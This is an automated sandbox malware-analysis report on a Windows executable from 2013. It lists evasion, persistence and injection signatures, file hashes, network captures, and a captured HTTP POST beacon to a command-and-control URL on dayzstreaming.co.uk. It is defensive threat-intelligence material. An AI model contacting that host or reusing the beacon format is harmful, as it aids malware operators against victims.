Loading ...

General Information

Analysis ID:428
Start time:07:15:57
Start date:28/11/2013
Overall analysis duration:0h 3m 9s
Report type:full
Sample file name:1.exe
Cookbook file name:windows.jbs
Analysis system description:Windows 7
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
HCA enabled:true
HCA success:true, ratio: 100%
Warnings:
  • Report size getting too big, too many NtMapViewOfSection calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

StrategyReport FP/FN
Threshold


Signature Overview

Networking:

Contains functionality to download additional files from the internetShow sources
Urls found in memory or binary dataShow sources
Performs DNS lookupsShow sources
Posts data to webserverShow sources
Only suspicious signatures are shown. Full signature information is available in Joe Security's commercial products.

Boot Survival:

Contains functionality to start windows servicesShow sources
Creates an autostart registry keyShow sources
Only suspicious signatures are shown. Full signature information is available in Joe Security's commercial products.

Stealing of Sensitive Information:

Only suspicious signatures are shown. Full signature information is available in Joe Security's commercial products.

Persistence and Installation Behavior:

Contains functionality to download and launch executablesShow sources

Data Obfuscation:

Binary may include packed or encrypted dataShow sources
Contains functionality to dynamically determine API callsShow sources
PE file contains an invalid checksumShow sources
PE sections with suspicious entropy foundShow sources

Spreading:

Contains functionality to enumerate / list files inside a directoryShow sources
Contains functionality to get notified if a device is plugged in / outShow sources

System Summary:

Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Contains functionality to enum processes or threadsShow sources
Creates files inside the program directoryShow sources
Creates files inside the user directoryShow sources
Reads ini filesShow sources
Spawns processesShow sources
Contains functionality to call native functionsShow sources
Contains functionality to communicate with device driversShow sources
Reads the hosts fileShow sources
Uses Microsoft's Enhanced Cryptographic ProviderShow sources

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to create a new security descriptorShow sources
Checks for installed Antivirus programsShow sources
Contains functionality to inject threads in other processesShow sources
Contains functionality to launch a program with higher privilegesShow sources
May try to detect the Windows Explorer process (often used for injection)Show sources
Only suspicious signatures are shown. Full signature information is available in Joe Security's commercial products.

Anti Debugging:

Contains functionality to query system informationShow sources
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Checks if the current process is being debuggedShow sources
Contains functionality for execution timing, often used to detect debuggersShow sources
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Contains functionality to dynamically determine API callsShow sources
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Enables debug privilegesShow sources
Launches processes in debugging mode, may be used to hinder debuggingShow sources
Only suspicious signatures are shown. Full signature information is available in Joe Security's commercial products.

Virtual Machine Detection:

Contains functionality to enumerate / list files inside a directoryShow sources
Contains functionality to query system informationShow sources
Queries a list of all running processesShow sources
May tried to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Only suspicious signatures are shown. Full signature information is available in Joe Security's commercial products.

Hooking and other Techniques for Stealthness and Protection:

Only suspicious signatures are shown. Full signature information is available in Joe Security's commercial products.

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)Show sources
Only suspicious signatures are shown. Full signature information is available in Joe Security's commercial products.

Language, Device and Operating System Detection:

Contains functionality to query local / system timeShow sources
Contains functionality to query time zone informationShow sources
Contains functionality to query windows versionShow sources

Screenshot

Startup

  • system is w7
  • 1.exe (PID: 3888 MD5: C0D2E08C3F0D964858B8A9788AA6732E)
    • 1.exe (PID: 3412 MD5: C0D2E08C3F0D964858B8A9788AA6732E)
      • schtasks.exe (PID: 3464 MD5: BA17F6EBA7152354FE67ADE9BDCDA60E)
      • explorer.exe (PID: 2772 MD5: 2626FC9755BE22F805D3CFA0CE3EE727)
        • explorer.exe (PID: 1104 MD5: 2626FC9755BE22F805D3CFA0CE3EE727)
        • conhost.exe (PID: 3328 MD5: 29D9FCDF65B7C823688A035937BB6697)
  • cleanup

Created / dropped Files

File PathHashes
C:\ProgramData\blacksilver0\nnkzcpsaq.exe (copy)
  • MD5: C0D2E08C3F0D964858B8A9788AA6732E
  • SHA: FD8749ED0EEDB4CA07803565881A706C8869BD01
  • SHA-256: 917627C7E3DEC25D7EB80020C98804C8FF993922DA9F0076200A8D4B6927A7EF
  • SHA-512: AC437025BAE1CFA0F76CE4A26AA4EFA09F5AE2E1CCBBB61B8C781EBABCFA6C4552750481ECA2E98B1151BF1F2B736E051590623891F7D2D4D9249F68759A60C5
C:\Users\admin\AppData\Local\Microsoft\Windows\WER\ERC\responsestatecache.xml
  • MD5: E5A5A467DD553B6B673677505C72444E
  • SHA: B3C6675C52CAA141B0BD349CB8821ACBEE060911
  • SHA-256: 0638CE2BE72BEFBB12472A98E6D40D37A6032AD0B4AA48B162C66B50C2C44DDA
  • SHA-512: 45A28659BDC1EE691E09DDCF708DBD63E9C8330B3C3BDFD7E91053B6F3D2A4AD43DA96D42B182AFF0BDE87A0BD6901FB003E12443C8F44DEA0C1B547F1025521
\samr
  • MD5: 080E701E8B8E2E9C68203C150AC7C6B7
  • SHA: 4EF041621388B805758AE1D3B122F9D364705223
  • SHA-256: FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
  • SHA-512: C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79

Contacted Domains

NameIPName ServerActiveRegistrare-Mail
dayzstreaming.co.uk37.221.170.194dns3.registrar-servers.com dns5.registrar-servers.com dns4.registrar-servers.com dns1.registrar-servers.com dns2.registrar-servers.com trueunknown

Contacted IPs

IPCountryPingableOpen Ports
195.168.1.121Slovakia (SLOVAK Republic)false
37.221.170.194Romaniafalse
224.0.0.252Reservedfalse
157.56.141.114United Statesfalse80 443
239.255.255.250Reservedfalse
157.56.144.215United Statesfalse

Static File Info

File type:PE32 executable (GUI) Intel 80386, for MS Windows
File name:1.exe
File size:226617
MD5:c0d2e08c3f0d964858b8a9788aa6732e
SHA1:fd8749ed0eedb4ca07803565881a706c8869bd01
SHA256:917627c7e3dec25d7eb80020c98804c8ff993922da9f0076200a8d4b6927a7ef
SHA512:ac437025bae1cfa0f76ce4a26aa4efa09f5ae2e1ccbbb61b8c781ebabcfa6c4552750481eca2e98b1151bf1f2b736e051590623891f7d2d4d9249f68759a60c5

Static PE Info

General
Entrypoint:0x4062cb
Entrypoint Section:.text
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x5283865B [Wed Nov 13 14:02:03 2013 UTC]
TLS Callbacks:
Digitally signed:False
CLR (.Net) Version:
Resources
NameRVASizeTypeLanguageCountry
RT_ICON0xd4000xea8data
RT_MENU0xe2a80xdadataChineseChina
RT_DIALOG0xe3840x14cdataGermanSwitzerland
RT_DIALOG0xe4d00x80dataEnglishUnited States
RT_DIALOG0xe5500x182dataFrenchCanada
RT_STRING0xe6d40x8cdataChineseChina
RT_STRING0xe7600x36dataChineseChina
RT_STRING0xe7980x92PCX ver. 2.5 image dataChineseChina
RT_STRING0xe82c0xc0Hitachi SH big-endian COFF executable, strippedChineseChina
RT_STRING0xe8ec0x136dataChineseChina
RT_STRING0xea240x3cdataChineseChina
RT_STRING0xea600x60dataChineseChina
RT_STRING0xeac00x54dataChineseChina
RT_STRING0xeb140x3adataChineseChina
RT_STRING0xeb500xa4DBase 3 index fileChineseChina
RT_STRING0xebf40x3edataChineseChina
RT_ACCELERATOR0xec340x10dataChineseChina
RT_GROUP_ICON0xec440x14MS Windows icon resource - 1 icon
Imports
DLLImport
MFC42.DLL
MSVCRT.dllcos, __CxxFrameHandler, memcpy, _ftol, sin, malloc, memset
KERNEL32.dllCreateFileW, GetCurrentProcessId, OpenProcess, Sleep, GetTimeZoneInformation, DeleteFileW, GetCurrentDirectoryW, LocalFree, MapViewOfFile, FlushFileBuffers, GetCurrentThreadId, HeapFree, FindClose, GlobalFree, GetModuleFileNameW
USER32.dllSystemParametersInfoW, DrawEdge, EnableWindow, DispatchMessageA, CreateDialogParamW, InvalidateRect, ReleaseDC, GetCursorPos, GetParent, GetSystemMenu, UpdateWindow, MessageBoxIndirectW
GDI32.dllDeleteObject, RealizePalette, SelectPalette, CreatePalette, CreateDIBitmap, GetCharacterPlacementW, TextOutW, LineTo, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, BitBlt, StretchDIBits
PSAPI.DLLGetModuleFileNameExA
Sections
NameVirtual AddressVirtual SizeRaw SizeEntropy
.text0x10000x81d40x90005.98709818213
.rdata0xa0000x165a0x90006.16881507582
.data0xc0000xb40x10000.322800881826
.rsrc0xd0000x1c580x20004.94507807665
Possible Origin
Language of compilation systemCountry where language is spokenMap
ChineseChina
GermanSwitzerland
EnglishUnited States
FrenchCanada

Network Behavior

TCP Packets
TimestampSource PortDest PortSource IPDest IP
Nov 28, 2013 07:16:29.895668983 CET586885355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:29.895675898 CET586885355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:29.997387886 CET586885355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:29.997394085 CET586885355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:31.622075081 CET49176443192.168.0.3157.56.141.114
Nov 28, 2013 07:16:33.009309053 CET5628253192.168.0.3195.168.1.121
Nov 28, 2013 07:16:33.330398083 CET5356282195.168.1.121192.168.0.3
Nov 28, 2013 07:16:34.168059111 CET592125355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:34.168066025 CET592125355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:34.263489008 CET592125355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:34.263494968 CET592125355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:36.775176048 CET5268753192.168.0.3195.168.1.121
Nov 28, 2013 07:16:36.961488962 CET5352687195.168.1.121192.168.0.3
Nov 28, 2013 07:16:37.670259953 CET49176443192.168.0.3157.56.141.114
Nov 28, 2013 07:16:52.262357950 CET6419853192.168.0.3195.168.1.121
Nov 28, 2013 07:16:52.420353889 CET5364198195.168.1.121192.168.0.3
Nov 28, 2013 07:16:52.426619053 CET6121953192.168.0.3195.168.1.121
Nov 28, 2013 07:16:52.869318008 CET5361219195.168.1.121192.168.0.3
Nov 28, 2013 07:16:52.981300116 CET4918080192.168.0.337.221.170.194
Nov 28, 2013 07:16:52.981343031 CET804918037.221.170.194192.168.0.3
Nov 28, 2013 07:16:52.981477976 CET4918080192.168.0.337.221.170.194
Nov 28, 2013 07:16:52.982619047 CET4918080192.168.0.337.221.170.194
Nov 28, 2013 07:16:52.982636929 CET804918037.221.170.194192.168.0.3
Nov 28, 2013 07:16:58.134048939 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:16:58.134061098 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:00.108828068 CET804918037.221.170.194192.168.0.3
Nov 28, 2013 07:17:00.108947992 CET4918080192.168.0.337.221.170.194
Nov 28, 2013 07:17:00.109597921 CET4918080192.168.0.337.221.170.194
Nov 28, 2013 07:17:00.109622955 CET804918037.221.170.194192.168.0.3
Nov 28, 2013 07:17:01.049108982 CET540035355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:01.049114943 CET540035355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:01.122612953 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:01.122620106 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:01.153697968 CET540035355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:01.153703928 CET540035355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:03.903907061 CET564575355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:03.903913021 CET564575355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:04.013012886 CET564575355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:04.013017893 CET564575355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:04.122205973 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:04.122217894 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:04.249618053 CET4987953192.168.0.3195.168.1.121
Nov 28, 2013 07:17:04.564111948 CET5349879195.168.1.121192.168.0.3
Nov 28, 2013 07:17:27.549781084 CET552775355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:27.549787045 CET552775355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:27.649880886 CET552775355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:27.649887085 CET552775355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:28.383827925 CET5123353192.168.0.3195.168.1.121
Nov 28, 2013 07:17:28.481726885 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.481738091 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.489522934 CET5351233195.168.1.121192.168.0.3
Nov 28, 2013 07:17:28.720371962 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.720386028 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.721329927 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.721337080 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.843223095 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.843236923 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.966346025 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.966356993 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:29.718537092 CET5957053192.168.0.3195.168.1.121
Nov 28, 2013 07:17:29.981165886 CET5359570195.168.1.121192.168.0.3
Nov 28, 2013 07:17:29.982398033 CET5761353192.168.0.3195.168.1.121
Nov 28, 2013 07:17:29.982458115 CET5357613195.168.1.121192.168.0.3
Nov 28, 2013 07:17:30.402442932 CET632135355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:30.402447939 CET632135355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:30.497788906 CET632135355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:30.497793913 CET632135355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:31.715928078 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:31.715943098 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:32.951653957 CET5213853192.168.0.3195.168.1.121
Nov 28, 2013 07:17:33.283871889 CET5352138195.168.1.121192.168.0.3
Nov 28, 2013 07:17:34.715907097 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:34.715917110 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:37.734961987 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:37.734973907 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:40.732364893 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:40.732376099 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:43.731961966 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:43.731977940 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.357409000 CET5887353192.168.0.3195.168.1.121
Nov 28, 2013 07:17:44.456975937 CET5358873195.168.1.121192.168.0.3
Nov 28, 2013 07:17:44.556034088 CET5851853192.168.0.3195.168.1.121
Nov 28, 2013 07:17:44.556164026 CET5358518195.168.1.121192.168.0.3
Nov 28, 2013 07:17:44.688368082 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.688375950 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.759063959 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.759079933 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.765594959 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.765604019 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.957603931 CET5507653192.168.0.3195.168.1.121
Nov 28, 2013 07:17:44.957719088 CET5355076195.168.1.121192.168.0.3
Nov 28, 2013 07:17:44.958497047 CET6094453192.168.0.3195.168.1.121
Nov 28, 2013 07:17:44.958543062 CET5360944195.168.1.121192.168.0.3
Nov 28, 2013 07:17:46.061209917 CET6278953192.168.0.3195.168.1.121
Nov 28, 2013 07:17:46.061326027 CET5362789195.168.1.121192.168.0.3
Nov 28, 2013 07:17:46.746404886 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:46.746417046 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.248678923 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.248691082 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.372385025 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.372394085 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.762839079 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.762851000 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:49.731966972 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:49.731980085 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:50.762788057 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:50.762804031 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:52.731554031 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:52.731560946 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:18:00.108830929 CET5843953192.168.0.3195.168.1.121
Nov 28, 2013 07:18:00.108964920 CET5358439195.168.1.121192.168.0.3
Nov 28, 2013 07:18:00.120240927 CET4918680192.168.0.337.221.170.194
Nov 28, 2013 07:18:00.120275974 CET804918637.221.170.194192.168.0.3
Nov 28, 2013 07:18:00.120352983 CET4918680192.168.0.337.221.170.194
Nov 28, 2013 07:18:00.121244907 CET4918680192.168.0.337.221.170.194
Nov 28, 2013 07:18:00.121269941 CET804918637.221.170.194192.168.0.3
Nov 28, 2013 07:18:07.235912085 CET804918637.221.170.194192.168.0.3
Nov 28, 2013 07:18:07.236033916 CET4918680192.168.0.337.221.170.194
Nov 28, 2013 07:18:07.236289024 CET4918680192.168.0.337.221.170.194
Nov 28, 2013 07:18:07.236305952 CET804918637.221.170.194192.168.0.3
UDP Packets
TimestampSource PortDest PortSource IPDest IP
Nov 28, 2013 07:16:29.895668983 CET586885355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:29.895675898 CET586885355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:29.997387886 CET586885355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:29.997394085 CET586885355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:33.009309053 CET5628253192.168.0.3195.168.1.121
Nov 28, 2013 07:16:33.330398083 CET5356282195.168.1.121192.168.0.3
Nov 28, 2013 07:16:34.168059111 CET592125355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:34.168066025 CET592125355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:34.263489008 CET592125355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:34.263494968 CET592125355192.168.0.3224.0.0.252
Nov 28, 2013 07:16:36.775176048 CET5268753192.168.0.3195.168.1.121
Nov 28, 2013 07:16:36.961488962 CET5352687195.168.1.121192.168.0.3
Nov 28, 2013 07:16:52.262357950 CET6419853192.168.0.3195.168.1.121
Nov 28, 2013 07:16:52.420353889 CET5364198195.168.1.121192.168.0.3
Nov 28, 2013 07:16:52.426619053 CET6121953192.168.0.3195.168.1.121
Nov 28, 2013 07:16:52.869318008 CET5361219195.168.1.121192.168.0.3
Nov 28, 2013 07:16:58.134048939 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:16:58.134061098 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:01.049108982 CET540035355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:01.049114943 CET540035355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:01.122612953 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:01.122620106 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:01.153697968 CET540035355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:01.153703928 CET540035355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:03.903907061 CET564575355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:03.903913021 CET564575355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:04.013012886 CET564575355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:04.013017893 CET564575355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:04.122205973 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:04.122217894 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:04.249618053 CET4987953192.168.0.3195.168.1.121
Nov 28, 2013 07:17:04.564111948 CET5349879195.168.1.121192.168.0.3
Nov 28, 2013 07:17:27.549781084 CET552775355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:27.549787045 CET552775355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:27.649880886 CET552775355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:27.649887085 CET552775355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:28.383827925 CET5123353192.168.0.3195.168.1.121
Nov 28, 2013 07:17:28.481726885 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.481738091 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.489522934 CET5351233195.168.1.121192.168.0.3
Nov 28, 2013 07:17:28.720371962 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.720386028 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.721329927 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.721337080 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.843223095 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.843236923 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.966346025 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:28.966356993 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:29.718537092 CET5957053192.168.0.3195.168.1.121
Nov 28, 2013 07:17:29.981165886 CET5359570195.168.1.121192.168.0.3
Nov 28, 2013 07:17:29.982398033 CET5761353192.168.0.3195.168.1.121
Nov 28, 2013 07:17:29.982458115 CET5357613195.168.1.121192.168.0.3
Nov 28, 2013 07:17:30.402442932 CET632135355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:30.402447939 CET632135355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:30.497788906 CET632135355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:30.497793913 CET632135355192.168.0.3224.0.0.252
Nov 28, 2013 07:17:31.715928078 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:31.715943098 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:32.951653957 CET5213853192.168.0.3195.168.1.121
Nov 28, 2013 07:17:33.283871889 CET5352138195.168.1.121192.168.0.3
Nov 28, 2013 07:17:34.715907097 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:34.715917110 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:37.734961987 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:37.734973907 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:40.732364893 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:40.732376099 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:43.731961966 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:43.731977940 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.357409000 CET5887353192.168.0.3195.168.1.121
Nov 28, 2013 07:17:44.456975937 CET5358873195.168.1.121192.168.0.3
Nov 28, 2013 07:17:44.556034088 CET5851853192.168.0.3195.168.1.121
Nov 28, 2013 07:17:44.556164026 CET5358518195.168.1.121192.168.0.3
Nov 28, 2013 07:17:44.688368082 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.688375950 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.759063959 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.759079933 CET579963702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.765594959 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.765604019 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:44.957603931 CET5507653192.168.0.3195.168.1.121
Nov 28, 2013 07:17:44.957719088 CET5355076195.168.1.121192.168.0.3
Nov 28, 2013 07:17:44.958497047 CET6094453192.168.0.3195.168.1.121
Nov 28, 2013 07:17:44.958543062 CET5360944195.168.1.121192.168.0.3
Nov 28, 2013 07:17:46.061209917 CET6278953192.168.0.3195.168.1.121
Nov 28, 2013 07:17:46.061326027 CET5362789195.168.1.121192.168.0.3
Nov 28, 2013 07:17:46.746404886 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:46.746417046 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.248678923 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.248691082 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.372385025 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.372394085 CET542673702192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.762839079 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:47.762851000 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:49.731966972 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:49.731980085 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:50.762788057 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:50.762804031 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:52.731554031 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:17:52.731560946 CET612221900192.168.0.3239.255.255.250
Nov 28, 2013 07:18:00.108830929 CET5843953192.168.0.3195.168.1.121
Nov 28, 2013 07:18:00.108964920 CET5358439195.168.1.121192.168.0.3
DNS Queries
TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Nov 28, 2013 07:16:52.426619053 CET192.168.0.3195.168.1.1210xe9e1Standard query (0)dayzstreaming.co.ukA (IP address)IN (0x0001)
Nov 28, 2013 07:18:00.108830929 CET192.168.0.3195.168.1.1210x8492Standard query (0)dayzstreaming.co.ukA (IP address)IN (0x0001)
DNS Answers
TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Nov 28, 2013 07:16:52.869318008 CET195.168.1.121192.168.0.30xe9e1No error (0)dayzstreaming.co.uk37.221.170.194A (IP address)IN (0x0001)
Nov 28, 2013 07:18:00.108964920 CET195.168.1.121192.168.0.30x8492No error (0)dayzstreaming.co.uk37.221.170.194A (IP address)IN (0x0001)
HTTP Request Dependency Graph
  • dayzstreaming.co.uk
HTTP Packets
TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
Nov 28, 2013 07:16:52.982619047 CET4918080192.168.0.337.221.170.194POST /gato/order.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: dayzstreaming.co.uk
Content-Length: 646
Cache-Control: no-cache
Data Raw: 70 73 30 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 70 73 31 3d 46 33 41 44 46 44 36 37 30 46 34 33 32 36 39 39 46 38 35 38 43 32 46 37 38 33 42 32 30 35 30 33 32 39 34 30 45 45 31 36 32 37 41 46 35 31 44 43 46 43 34 43 39 37 34 42 42 30 37 43 32 43 42 34 32 41 35 41 34 35 30 31 38 44 36 33 30 45 39 34 37 45 31 33 46 35 43 37 37 46 43 36 39 34 33 44 35 39 38 42 35 31 32 38 32 44 46 30 38 43 32 31 43 32 33 46 34 31 45 38 39 35 39 39 36 42 46 41 30 44 44 35 32 35 44 31 34 34 36 36 37 35 36 33 38 32 33 30 36 43 42 38 35 42 30 38 46 32 46 42 32 34 38 39 43 44 33 35 34 30 33 39 36 33 35 39 33 45 43 43 34 46 46 35 42 37 31 30 46 32 34 43 34 42 37 44 32 37 34 39 31 32 39 34 30 37 36 34 38 38 35 38 38 41 44 30 31 32 37 34 32 38 39 41 36 39 39 34 30 34 37 43 35 32 41 35 45 39 37 32 45 30 44 32 31 44 37 33 39 37 41 43 37 37 31 38 41 35 31 34 41 45 34 38 42 45 37 30 34 38 30 41 36 41 43 41 44 33 37 46 35 42 35 42 35 39 43 30 35 44 42 35 32 45 33 41 26 63 73 31 3d 35 45 43 43 38 33 45 41 34 31 43 43 45 39 45 41 36 46 43 43 44 36 45 41 37 41 43 43 43 42 45 41 37 43 43 43 44 34 45 41 35 39 43 43 44 38 45 41 36 39 43 43 44 38 45 41 34 31 43 43 44 42 45 41 37 31 43 43 44 38 45 41 37 45 43 43 44 32 45 41 36 45 43 43 44 30 45 41 37 31 43 43 43 46 45 41 37 38 43 43 43 42 45 41 32 44 43 43 45 35 45 41 37 